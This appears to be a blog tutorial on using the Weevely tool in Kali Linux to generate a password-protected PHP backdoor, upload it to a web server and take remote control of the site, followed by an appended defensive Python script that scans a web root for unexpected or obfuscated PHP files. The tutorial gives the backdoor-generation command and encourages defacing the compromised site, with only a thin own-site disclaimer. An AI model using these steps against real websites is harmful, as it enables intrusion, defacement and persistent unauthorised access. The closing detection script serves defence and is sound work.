Hello, friends. I am Patel Mubassir. Today we are going to learn how to hack a website using Weevely in Kali Linux 2018.1. Before starting, let me introduce Weevely.
What is Weevely?
Weevely is a web shell designed for remote server administration and penetration testing that can be extended over the network at runtime with more than 30 modules.
It executes remote code via an obfuscated PHP agent located on the compromised HTTP server. It fits both web administration and penetration testing post-exploitation scenarios to maintain access, provide situational awareness, escalate the privileges, and move laterally in the network.
How To Install Weevely In Kali Linux 2018.1?
Generally, Weevely comes preinstalled in Kali Linux. Simply enter the weevely command in the terminal and you will see output like the terminal output below. Or you can git clone it from Here.

    root@D4rk5h4d0w:~# weevely
    [+] weevely 3.2.0
    [!] Error: too few arguments

    [+] Run terminal to the target
        weevely <URL> <password> [cmd]

    [+] Load session file
        weevely session <path> [cmd]

    [+] Generate backdoor agent
        weevely generate <password> <path>
First, we have to generate a PHP backdoor using the generate command. Let's generate a password-protected PHP backdoor. As we can see, the PHP backdoor shell is generated with the password 12345.
    root@D4rk5h4d0w:~# weevely generate 12345 /root/Desktop/phpShell.php
    Generated backdoor with password '12345' in '/root/Desktop/phpShell.php' of 1459 byte size.
Now we have to upload this shell to the website. I have my own website, so I am going to upload the shell there. Okay, I have already uploaded the shell to my website. Let's try to connect using Weevely. In this step, we just have to pass the PHP shell URL and the shell password.
That's all. Now we have the shell. Now you can do anything with this fucking site; you can even simply deface it :). That was my own site, on which the shell was uploaded. You can watch the video for a better understanding.
Note: This is only for demonstration purposes, and I used my own website for the demonstration.
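On the server side, the agent described above is an obfuscated PHP file that appears in the web root after an upload. The following Python script is an added example, not part of the original post or of the Weevely project: it reports PHP files that are missing from, or differ from, a deployment manifest and annotates each with generic obfuscation indicators. The heuristics, the 4.5-bit entropy threshold, the manifest format and the sample files are assumptions made for this example, not Weevely signatures.

```python
import hashlib, math, os, re, tempfile
from collections import Counter

# Generic obfuscation heuristics (assumptions for this example, not Weevely signatures).
DYNAMIC_CALL = re.compile(r"\$\w+\s*\(")  # $f(...): function name held in a variable
RISKY_FUNCS = re.compile(r"\b(eval|assert|create_function|base64_decode|gzinflate)\s*\(", re.I)
LONG_LITERAL = re.compile(r"""(['"])([^'"\\]{40,})\1""")
PHP_EXT = (".php", ".phtml", ".php5", ".phar")

def entropy(s):  # Shannon entropy in bits per character
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())

def triage(text):
    """Return the obfuscation indicators present in PHP source text."""
    hits = []
    if DYNAMIC_CALL.search(text):
        hits.append("variable-function call")
    if RISKY_FUNCS.search(text):
        hits.append("eval/decode function")
    if any(entropy(m.group(2)) > 4.5 for m in LONG_LITERAL.finditer(text)):
        hits.append("high-entropy string literal")
    return hits

def audit_webroot(root, manifest):
    """manifest maps relative path -> SHA-256 of each file you deployed."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in (n for n in names if n.lower().endswith(PHP_EXT)):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            digest = hashlib.sha256(data).hexdigest()
            if manifest.get(rel) == digest:
                continue  # deployed file, unchanged
            why = "hash differs from manifest" if rel in manifest else "not in deployment manifest"
            findings[rel] = [why] + triage(data.decode("utf-8", "replace"))
        # directories without PHP files produce no findings
    return findings

def demo():
    """Constructed web root: one deployed page plus a harmless stand-in for an uploaded agent."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "uploads"))
    index = b'<?php echo "hello"; ?>'
    blob = "q7Zk2LmX9aB4cV1nR8tY3uW6eH0sJ5dGfPoIxKzMyNbCvTrE"  # constructed, not a payload
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(index)
    with open(os.path.join(root, "uploads", "avatar.php"), "w") as fh:
        fh.write("<?php $b='%s'; $f='strlen'; echo $f($b); ?>" % blob)
    return audit_webroot(root, {"index.php": hashlib.sha256(index).hexdigest()})
```

The manifest comparison is the primary control; the indicators only help rank what it reports, since legitimate code can also trip them.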